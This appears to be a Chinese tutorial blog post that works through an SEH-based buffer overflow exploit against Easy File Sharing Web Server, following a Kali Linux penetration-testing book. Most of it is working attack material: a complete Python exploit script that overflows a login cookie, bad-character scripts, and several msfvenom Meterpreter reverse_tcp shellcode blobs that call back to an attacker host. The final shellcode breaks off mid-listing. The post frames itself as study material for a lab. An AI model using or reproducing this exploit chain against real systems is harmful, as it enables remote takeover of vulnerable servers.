目录
说明
按照《Kali Linux2 网络渗透测试实践指南 第二版 》第11章操作和内容
仅供学习讨论使用,请勿进行非法操作
残留问题
随着Windows操作系统的安全性不断提高(尤其是Windows 10等操作系统的推出),简单地利用JMP ESP指令执行数据区域代码的方法已经很难实现了。发现了一个新途径,Windows操作系统下的结构化异常处理(Structured Exception Handing SEH)机制。有编程经验的人一定会对try/except 或者try/catch这种结构不陌生(其实这就是结构化异常处理):
try:
// 要执行的代码
except:
// 异常处理代码
这种格式的代码表示正常情况下try块会执行,但是如果在执行过程中发生了异常,就会执行except块,也就是异常处理代码。
什么是SEH溢出
当异常出现的时候,就是异常处理程序(Exception Handler)起作用的时候,如下图所示:
异常处理程序是用来捕获在程序执行期间生成的异常和错误代码模块, SEH机制可以保证程序继续执行而不崩溃。Windows操作系统中也有默认的异常处理程序,在一个应用程序崩溃的时候,我们一般会看到系统弹出一个“程序遇到错误,需要关闭”的窗口。当程序产生了异常以后,就会从栈中加载catch块的地址调用catch块。因此,如果以某种方式设法覆盖了栈中异常处理程序的catch块的地址,我们就能够控制这个应用程序。
因为新型操作系统安全性较强,可以执行的代码和不可执行数据是分开的。即便我们仍然可以将Shellcode放置在数据区域中(ESP寄存器中),但是这个Shellcode是无法执行的。
解释了上一篇提到的 “无论按多少次,永远不会执行且ESP地址越来越小,离我们的shellcode可谓是越来越远。”
而异常处理程序的地址仍然在可以执行的代码区域,所以可以利用这个地址来执行Shellcode。
解释了上一篇提到的 “EIP(下一个地址)会一直保留为0x41414141即AAAA十六进制下的值。不对啊,刚才不是验证过BBBB成立的么。那再试一下。发现异常代码还是0x41414141,莫不是4071个’A’里有什么玄学?”
下图给出了如果我们向程序提供了大量的A从而导致溢出之后的内存分布
由于有很多种异常,因此异常处理程序不是一个简单的结构,而是一个异常处理链。当捕获了异常后,会将异常交给SEH链,如果当前异常处理程序无法处理这个异常,会交给下一个异常处理程序。
每一条SEH记录都是由8字节所组成,其中前面的4字节是它后面的SEH异常处理程序的地址,后面的4字节是catch块的地址。一个应用程序可能有多个异常处理程序,因此一个SEH记录将前4个字节用来保存下一条SEH记录的地址。
基于SEH溢出进行渗透的步骤:
1)引起应用程序的异常,这样才可以调用异常处理程序。
2)**使用一条POP/POP/RETN指令的地址来改写异常处理程序的地址,**因为我们需要将执行切换到下一条SEH记录的地址(catch异常处理程序地址前面的4字节)。之所以使用POP/POP/RET,是因为用来调用catch块的内存地址保存在栈中,指向下一个异常处理程序指针的地址就是ESP+8(ESP是栈顶指针)。因此,两个POP操作就可以将执行重定向到下一条SEH记录的地址。 注:短跳转指令的编码为 xeb\x06,为了补齐,需要增加2个\x90
3)在第一步输入数据的时候,我们已经将下一条SEH记录的地址替换成了跳转到攻击载荷的JMP指令的地址。因此,当第二个步骤结束时,程序就会跳过指定数量的字节去执行ShellCode。
4)当成功跳转到ShellCode之后,攻击载荷就会执行,我们也获得了目标系统的管理权限。
环境准备
参考上一篇,不再赘述。
重新渗透
精准定位
上一篇提到的log窗口找到定位到EIP contains normal pattern : 0x46376646 (offset 4071)。我们当时认为4071是这个程序能承受的极限,同时设置偏移量为4071
基于提到的SEH技术,我们再次重新看下图片里的信息ECX contains normal pattern : 0x46336646 (offset 4059)。ECX是计数器(counter ),是重复前缀和循环指令的内定计数器。
这个值会不会和SEH有关?
不用猜了,Immunity Debugger工具自带查看SEH的窗口。
我们再次触发上一篇提到的带4100个的程序
这次要留意SEH窗口里的信息。
粘贴出来,内容如下
SEH chain of thread 00000184
Address SE handler
46336646 *** CORRUPT ENTRY ***
用./pattern_offset.rb验证地址0x46376646,也是一样的结果
┌──(kali㉿kali)-[/usr/share/metasploit-framework/tools/exploit]
└─$ ./pattern_offset.rb -q 46336646 -l 4100
[*] Exact match at offset 4059
至此,可以确定SEH的偏移量为4059
查找POP/POP/RET指令的地址
现在需要从一个外部的DLL文件载入一个地址,而且是一个没有被SafeSEH保护的DLL文件的POP/POP/RET指令地址。利用Mona.py,使用!mona rop命令来查找POP/POP/RET指令。执行的结果既可以在Log窗口查看结果,也同时生成C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt文件(地址为Mona所在路径,我放在Immunity Debugger同级目录下的)。既然不受SafeSEH机制保护的才可以使用,也就是表中SafeSEH列值为False的。另外,要在这些文件中查找POP/POP/RET指令的相关地址。找错了接下来步骤会不对的哈。
下面列出SafeSEH为False的dll:
-----------------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
0x61c00000 | 0x61c99000 | 0x00099000 | False | False | False | False | False | 3.8.8.3 [sqlite3.dll] (C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll)
0x005d0000 | 0x006e7000 | 0x00117000 | True | False | False | False | False | 0.9.8k [LIBEAY32.dll] (C:\EFS Software\Easy File Sharing Web Server\LIBEAY32.dll)
针对sqlite3.dll没有找到POP/POP/RET指令
针对LIBEAY32.dll没有找到对应的指令
看看ImageLoad.dll,在这个文件中找到若干条POP/POP/RET指令和它的地址。(有非常多,挑着试一下)
#0x100202e1 : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
#0x100202ef : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
#0x1002033a : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
#0x1002033a : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
基于上述分析,只剩下第一个ImageLoad.dll可能被利用,先选择0x100202e1作为要使用的POP/POP/RET指令地址。
至此,有了2个可以用来编写渗透模块的重要组件,一个是偏移量,另一个是用来载入catch块的地址,也就是POP/POP/RET指令的地址。
使用Python编写渗透模块
重新定义发往目标服务器的数据,包括如下几个部分:
导致目标服务溢出的字符(4059个“A”)Payload = “A” * 4059
实现跳转的指令(“\xeb\x06\x90\x90”)buff += “\xeb\x06\x90\x90”
POP/POP/RET指令地址 buff += “\x43\x77\x01\x10”
用来实现空指令滑行的代码,作用就是在跳转地址和Shellcode之间设置一个滑行区域,这个区域使用空指令填充,从而避免Shellcode中的代码不能正常执行,在此处添加30、40、50个空指令都可以使代码滑行到Shellcode部分(这个数值通过测试得到)。空指令的数量太少会崩溃,太多会死机 。 Payload += “\x90” * 40
用来在目标主机上实现特定功能的代码,在很多地方可以找到这种代码,另外Kali 中也提供了这种工具,下面是一代码的作用就是启动Windows系统下的计算器。
shellcode=b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a\x1c\x39\xbd"
完整的程序如下所示:
import requests
host = '192.168.229.135'
port = '80'
buff = "A"*4059
buff += "\xeb\x06\x90\x90" # jump command
buff += "\xe1\x02\x02\x10" # POP/POP/RET address: 0x100202e1(NOK), 0x100202ef(OK), 0x1002033a(OK), 0x10017743(OK)
buff += "\x90"*40
shellcode = "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a\x1c\x39\xbd"
buff += shellcode
cookies = dict(SESSIONID='25553',UserID= buff,PassWD='kali')
data = dict(frmLogin=True,frmUserName='kali',frmUserPass='kali',login='Login')
requests.post('http://'+host+':'+ port +'/forum.ghp', cookies=cookies, data=data)
执行这段程序以后,在目标主机查看反应,结果如下图所示:
书中提到可以继续完成渗透攻击,但没有提供对应的内容,那么接下来把对应工作结束,才算是真正完成渗透。
坏字符确认
- Easy File Sharing Web Server 程序先打开,使用Immunity Debugger,File->attach进来。使用 mona 生成字节数组,并默认排除空字节 (\x00),请注意生成的 bytearray.bin 文件的位置。在最下方对话框使用输入:
!mona bytearray -b "\x00\x0a"
- 回到攻击机(假设为kali,下文同),现在生成一串与字节数组相同的坏字符。把原来的脚本加上坏字符,触发。以下 python 脚本可用于生成从 \x01 到 \xff 的坏字符字符串:
#!/usr/bin/env python
from __future__ import print_function
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
- 回到靶机,观察Immunity Debugger中CPU窗口信息。在最下方对话框使用调用
# !mona bytearray -b "识别到的坏字符集合"。如,!mona bytearray -b "\x00\x0a" - 调用mona compare 命令引用你生成的字节数组,以及 ESP 指向的地址,来确认坏字符:
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a <esp地址>
路径是Mona.py所在位置,根据自己电脑配置有所不同,我的是C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin
这个<esp地址> 不是直接从屏幕上看到的,而是基于自己的构造坏字符,使用ESP dump去查看。注意:应该逐个排除坏字符,因为前一个坏字符可能会影响到后一个,导致好的字符被误判为坏字符。使用Ctrl + F4组合键可以查看之前找到的坏字符。
实际操作
这里特别说明下,坏字符确认时候全A,B,C,D的意义是更加方便的找到需要定位的地方。所以方才代码里的jump commnad, POP/POP/RET address都替换掉,并且结束为了更好的观察加上D进行区分。同时NOP不要。
buff = "A"*4059
buff += 'B'*4 #"\xeb\x06\x90\x90" # jump command
buff += 'C'*4 #"\xe1\x02\x02\x10" # POP/POP/RET address
buff += badchar
buff += 'D'*50
全部代码
import requests
host = '192.168.229.135'
port = '80'
buff = "A"*4059
buff += "B"*4 #"\xeb\x06\x90\x90" # jump command
buff += "C"*4 #"\xe1\x02\x02\x10" # POP/POP/RET address
# !mona bytearray -b "\x00\x0a"
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
badchars = "\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
buff += badchars
buff += "D"*(10000-4059-4-4-len(badchars))
cookies = dict(SESSIONID='25553',UserID= buff,PassWD='kali')
data = dict(frmLogin=True,frmUserName='kali',frmUserPass='kali',login='Login')
requests.post('http://'+host+':'+ port +'/forum.ghp', cookies=cookies, data=data)
第一次运行,先排除掉\x00\x0a
!mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a 04DD72A8
第二次运行,dump ESP寄存器地址后,可以看到badchar地址为0x04FA72A8
!mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a 04FA72A8
附,书中PPT给的答案是:"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
Metasploit生成shellcode
刚才计算器的打开只是一个示例,接下来生成真正的攻击代码。
回到Kali Linux,指令如下
┌──(kali㉿kali)-[~/Learning]
└─$ msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=5001 -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" -f python
生成的内容如下
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/05 --> success
buf = b""
buf += b"\x29\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\xb2\xf6\x2c\x9e\x83\xee\xfc\xe2\xf4\x4e\x1e"
buf += b"\xa3\x9e\xb2\xf6\x4c\x17\x57\xc7\xfe\xfa\x39\xa4\x1c"
buf += b"\x15\xe0\xfa\xa7\xcc\xa6\xc7\xd3\x15\xc0\xde\x23\x29"
buf += b"\xf8\xd0\x1d\x5e\x1e\xca\x4d\xe2\xb0\xda\x0c\x5f\x7d"
buf += b"\xfb\x2d\x59\xfb\x83\xc3\xcc\x39\xa4\x3c\x15\xf0\xca"
buf += b"\x7b\x9f\x62\x7d\x6c\xe6\x37\x36\x58\xd2\xb3\x26\xa7"
buf += b"\xc6\x92\x7d\x64\x86\xb3\x25\x7c\x1b\x7b\x82\x10\xd7"
buf += b"\x39\xc2\xa7\x9f\x64\xc7\xd3\xaf\x72\x37\xe3\x93\x1e"
buf += b"\xf7\xeb\xa6\x52\x83\xd8\x9d\xcf\x0e\x17\xe3\x96\x83"
buf += b"\xcc\xc6\x39\xae\x08\x9f\x61\x90\xa7\x92\xf9\x7d\x74"
buf += b"\x82\xb3\x25\xa7\x9a\x39\xf7\xfc\x17\xf6\xd2\x08\xc5"
buf += b"\xe9\x97\x75\xc4\xe3\x09\xcc\xc6\xed\xac\xa7\x8c\x5b"
buf += b"\x76\xd3\x61\x4d\xab\x44\xad\x80\xf6\x2c\xf6\xc5\x85"
buf += b"\x1e\xc1\xe6\x9e\x60\xe9\x94\xf1\xa5\x76\x4d\x26\x94"
buf += b"\x0e\xb3\xf6\x2c\xb7\x76\xa2\x7c\xf6\x9b\x76\x47\x9e"
buf += b"\x4d\x23\x46\x94\xda\x36\x84\x7b\x37\x9e\x2e\x9e\xa1"
buf += b"\x7f\xa5\x78\xe2\xa6\x7c\xce\xf2\xa6\x6c\xce\xda\x1c"
buf += b"\x23\x41\x52\x09\xf9\x09\xd8\xe6\x7a\xc9\xda\x6f\x89"
buf += b"\xea\xd3\x09\xf9\x1b\x72\x82\x26\x61\xfc\xfe\x59\x72"
buf += b"\x5a\x91\x2c\x9e\xb2\x9c\x2c\xf4\xb6\xa0\x7b\xf6\xb0"
buf += b"\x2f\xe4\xc1\x4d\x23\xaf\x66\xb2\x88\x1a\x15\x84\x9c"
buf += b"\x6c\xf6\xb2\xe6\x2c\x9e\xe4\x9c\x2c\xf6\xea\x52\x7f"
buf += b"\x7b\x4d\x23\xbf\xcd\xd8\xf6\x7a\xcd\xe5\x9e\x2e\x47"
buf += b"\x7a\xa9\xd3\x4b\x31\x0e\x2c\xe3\x9a\xae\x44\x9e\xf2"
buf += b"\xf6\x2c\xf4\xb2\xa6\x44\x95\x9d\xf9\x1c\x61\x67\xa1"
buf += b"\x44\xeb\xdc\xbb\x4d\x61\x67\xa8\x72\x61\xbe\xd2\x23"
buf += b"\x1b\xc2\x09\xd3\x61\x5b\x6d\xd3\x61\x4d\xf7\xef\xb7"
buf += b"\x74\x83\xed\x5d\x09\x06\x99\x3c\xe4\x9c\x2c\xcd\x4d"
buf += b"\x23\x2c\x9e"
#"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" 2022/10/05 --> success
buf = b""
buf += b"\x31\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\x05\x9a\xbb\x94\x83\xee\xfc\xe2\xf4\xf9\x72"
buf += b"\x34\x94\x05\x9a\xdb\xa5\xd7\xfe\x30\xc6\x35\x13\x5e"
buf += b"\x1f\x57\x96\x30\xc6\x11\xab\x44\x1f\x77\xb2\xb4\x23"
buf += b"\x4f\xbc\x8a\x54\xa9\xa6\xda\xe8\x07\xb6\x9b\x55\xca"
buf += b"\x97\xba\x53\x4c\xef\x54\xc6\x52\x11\xe9\x84\x8e\xd8"
buf += b"\x87\x95\xd5\x11\xfb\xec\x80\x5a\xcf\xd8\x04\x4a\x30"
buf += b"\xdc\x1d\x11\xe3\xb4\x04\x49\xeb\x11\xcc\xee\x87\xdd"
buf += b"\x34\x65\x30\xa0\x8e\x9b\x6d\xa5\xc5\x36\x7a\x5b\x08"
buf += b"\x9b\x7c\xac\xe5\xef\x4f\x97\x78\x62\x80\xe9\x21\xef"
buf += b"\x5b\xcc\x8e\xc2\x9f\x95\xd6\xfc\x30\x98\x4e\x11\xe3"
buf += b"\x88\x04\x49\x30\x90\x8e\x9b\x6b\x1d\x41\xbe\x9f\xcf"
buf += b"\x5e\xfb\xe2\xce\x54\x65\x5b\xcc\x5a\xc0\x30\x86\xec"
buf += b"\x1a\x44\x6b\xfa\xc7\xd3\xa7\x37\x9a\xbb\xfc\x72\xe9"
buf += b"\x89\xcb\x51\xf2\xf7\xe3\x23\x9d\x32\x7c\xfa\x4a\x03"
buf += b"\x04\x04\x9a\xbb\xbd\xc1\xce\xeb\xfc\x2c\x1a\xd0\x94"
buf += b"\xfa\x4f\xd1\x9e\x6d\x5a\x13\x71\x80\xf2\xb9\x94\x16"
buf += b"\x13\x32\x72\x55\xca\xeb\xc4\x45\xca\xfb\xc4\x6d\x70"
buf += b"\xb4\x4b\xe5\x65\x6e\x03\x6f\x8a\xed\xc3\x6d\x03\x1e"
buf += b"\xe0\x64\x65\x6e\x11\xc5\xee\xb1\x6b\x4b\x92\xce\x78"
buf += b"\xed\xfd\xbb\x94\x05\xf0\xbb\xfe\x01\xcc\xec\xfc\x07"
buf += b"\x43\x73\xcb\xfa\x4f\x38\x6c\x05\xe4\x8d\x1f\x33\xf0"
buf += b"\xfb\xfc\x05\x8a\xbb\x94\x53\xf0\xbb\xfc\x5d\x3e\xe8"
buf += b"\x71\xfa\x4f\x28\xc7\x6f\x9a\xed\xc7\x52\xf2\xb9\x4d"
buf += b"\xcd\xc5\x44\x41\x86\x62\xbb\xe9\x2d\xc2\xd3\x94\x45"
buf += b"\x9a\xbb\xfe\x05\xca\xd3\x9f\x2a\x95\x8b\x6b\xd0\xcd"
buf += b"\xd3\xe1\x6b\xd7\xda\x6b\xd0\xc4\xe5\x6b\x09\xbe\xb4"
buf += b"\x11\x75\x65\x44\x6b\xec\x01\x44\x6b\xfa\x9b\x78\xbd"
buf += b"\xc3\xef\x7a\x57\xbe\x6a\x0e\x36\x53\xf0\xbb\xc7\xfa"
buf += b"\x4f\xbb\x94"
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/04 --> success
buf = b""
buf += b"\x31\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\x9a\xab\x1e\x98\x83\xee\xfc\xe2\xf4\x66\x43"
buf += b"\x91\x98\x9a\xab\x7e\xa9\x48\xcf\x95\xca\xaa\x22\xfb"
buf += b"\x13\xc8\xa7\x95\xca\x8e\x20\x6c\xb0\x95\x1c\x54\xbe"
buf += b"\xab\x54\x2f\x58\x36\x97\x7f\xe4\x98\x87\x3e\x59\x55"
buf += b"\xa6\x1f\x5f\xd3\xde\xf1\xca\x11\xf9\x0e\x13\xd8\x97"
buf += b"\x1f\x48\xcd\x20\x5e\xe0\x1f\x6b\x6a\xd4\x9b\x7b\x4e"
buf += b"\x13\xc2\x8b\x1f\x4b\x11\xe3\x06\x1d\x53\xdf\x22\xa9"
buf += b"\x65\xe2\x95\xac\x11\xaa\xc8\xa9\x5a\x07\xdf\x57\x97"
buf += b"\xaa\xd9\xa0\x7a\xde\xea\x9b\xe7\x53\x25\xe5\xbe\xde"
buf += b"\xfe\xc0\x11\xf3\x3a\x99\x49\xcd\x95\x94\xd1\x20\x46"
buf += b"\x84\x9b\x78\x95\x9c\x11\xaa\xce\x11\xde\x8f\x3a\xc3"
buf += b"\xc1\xca\x47\xc2\xcb\x54\xfe\xc0\xc5\xf1\x95\x8a\x73"
buf += b"\x2b\xe1\x67\x65\xf6\x76\xab\xa8\xab\x1e\xf0\xed\xd8"
buf += b"\x2c\xc7\xce\xc3\x52\xef\xbc\xac\x97\x70\x65\x7b\xa6"
buf += b"\x08\x9b\xab\x1e\xb1\x5e\xff\x4e\xf0\xb3\x2b\x75\x98"
buf += b"\x65\x7e\x74\x92\xf2\x6b\xb6\x7d\x1f\xc3\x1c\x98\x89"
buf += b"\x22\x97\x7e\xca\xfb\x4e\xc8\xda\xfb\x5e\xc8\xf2\x41"
buf += b"\x11\x47\x7a\x54\xcb\x0f\xf0\xbb\x48\xcf\xf2\x32\xbb"
buf += b"\xec\xfb\x54\xcb\x1d\x5a\xdf\x14\x67\xd4\xa3\x6b\x74"
buf += b"\x72\xcc\x1e\x98\x9a\xc1\x1e\xf2\x9e\xfd\x49\xf0\x98"
buf += b"\x72\xd6\xc7\x65\x7e\x9d\x60\x9a\xd5\x28\x13\xac\xc1"
buf += b"\x5e\xf0\x9a\xbb\x1e\x98\xcc\xc1\x1e\xf0\xc2\x0f\x4d"
buf += b"\x7d\x65\x7e\x8d\xcb\xf0\xab\x48\xcb\xcd\xc3\x1c\x41"
buf += b"\x52\xf4\xe1\x4d\x19\x53\x1e\xe5\xb2\xf3\x76\x98\xda"
buf += b"\xab\x1e\xf2\x9a\xfb\x76\x93\xb5\xa4\x2e\x67\x4f\xfc"
buf += b"\x76\xed\xf4\xe6\x7f\x67\x4f\xf5\x40\x67\x96\x8f\x11"
buf += b"\x1d\xea\x54\xe1\x67\x73\x30\xe1\x67\x65\xaa\xdd\xb1"
buf += b"\x5c\xde\xdf\x5b\x21\x5b\xab\x3a\xcc\xc1\x1e\xcb\x65"
buf += b"\x7e\x1e\x98"
#2022/10/05 test not badchar--> fail
buf = b""
buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b"
buf += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f\xb7\x4a"
buf += b"\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
buf += b"\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x57"
buf += b"\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01"
buf += b"\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3\x85\xc9\x74"
buf += b"\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xac\xc1"
buf += b"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d"
buf += b"\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b"
buf += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
buf += b"\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xe5\x85\x68\x02"
buf += b"\x00\x13\x89\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += b"\x53\xff\xd5"
#2022/10/05 test "\x00\x0a" --> success
buf = b""
buf += b"\xb8\xed\xc4\xa1\xea\xd9\xeb\xd9\x74\x24\xf4\x5e\x2b"
buf += b"\xc9\xb1\x59\x31\x46\x14\x83\xee\xfc\x03\x46\x10\x0f"
buf += b"\x31\x5d\x02\x40\xba\x9e\xd3\x3e\x8a\x4c\xb7\x35\xbe"
buf += b"\x40\xb3\x1b\x33\x2a\x91\x8f\xc2\xc9\x27\x50\xdb\xa6"
buf += b"\x02\x88\x6f\xba\xba\xe5\xaf\x97\x87\x64\x4c\xea\xdb"
buf += b"\x46\x6d\x25\x2e\x87\xaa\xf3\x44\x68\x66\x53\x2c\x24"
buf += b"\x97\xd0\x70\xf4\x96\x36\xff\x44\xe1\x33\xc0\x30\x5d"
buf += b"\x3d\x11\x33\x15\x25\xc1\xc8\xfe\x75\xe0\x1d\x7b\xbc"
buf += b"\x96\x9d\xb5\xc0\x1e\x56\x81\xb5\xa0\xbe\xdb\x09\x0e"
buf += b"\xff\xd3\x87\x4e\x38\xd3\x77\x25\x32\x27\x05\x3e\x81"
buf += b"\x55\xd1\xcb\x15\xfd\x92\x6c\xf1\xff\x77\xea\x72\xf3"
buf += b"\x3c\x78\xdc\x10\xc2\xad\x57\x2c\x4f\x50\xb7\xa4\x0b"
buf += b"\x77\x13\xec\xc8\x16\x02\x48\xbe\x27\x54\x34\x1f\x82"
buf += b"\x1f\xd7\x76\xb2\xe0\x27\x77\xee\x76\xeb\xba\x11\x86"
buf += b"\x63\xcc\x62\xb4\x2c\x66\xed\xf4\xa5\xa0\xea\x8d\xa2"
buf += b"\x52\x24\x35\xa2\xac\xc5\x45\xea\x6a\x91\x15\x84\x5b"
buf += b"\x9a\xfe\x54\x63\x4f\x6a\x5f\xf3\xb0\xc2\xba\x86\x59"
buf += b"\x10\x45\x9a\x10\x9d\xa3\xcc\x72\xcd\x7b\xad\x22\xad"
buf += b"\x2b\x45\x29\x22\x13\x75\x52\xe9\x3c\x1c\xbd\x47\x14"
buf += b"\x89\x24\xc2\xee\x28\xa8\xd9\x8a\x6b\x22\xeb\x6b\x25"
buf += b"\xc3\x9e\x7f\x52\xb4\x60\x80\xa3\x51\x60\xea\xa7\xf3"
buf += b"\x37\x82\xa5\x22\x7f\x0d\x55\x01\xfc\x4a\xa9\xd4\x34"
buf += b"\x20\x9c\x42\x78\x5e\xe1\x82\x78\x9e\xb7\xc8\x78\xf6"
buf += b"\x6f\xa9\x2b\xe3\x6f\x64\x58\xb8\xe5\x87\x08\x6c\xad"
buf += b"\xef\xb6\x4b\x99\xaf\x49\xbe\x99\xa8\xb5\x3c\xb6\x10"
buf += b"\xdd\xbe\x86\xa0\x1d\xd5\x06\xf1\x75\x22\x28\xfe\xb5"
buf += b"\xcb\xe3\x57\xdd\x46\x62\x15\x7c\x56\xaf\xfb\x20\x57"
buf += b"\x5c\x20\xd3\x22\x2d\xd7\x14\xd3\x27\xbc\x15\xd3\x47"
buf += b"\xc2\x2a\x05\x7e\xb0\x6d\x95\xc5\xcb\xd8\xb8\x6c\x46"
buf += b"\x22\xee\x6f\x43"
#2022/10/05 test "\x00" --> fail
buf = b""
buf += b"\xbb\xf1\x7d\xa4\x80\xdb\xd1\xd9\x74\x24\xf4\x5a\x2b"
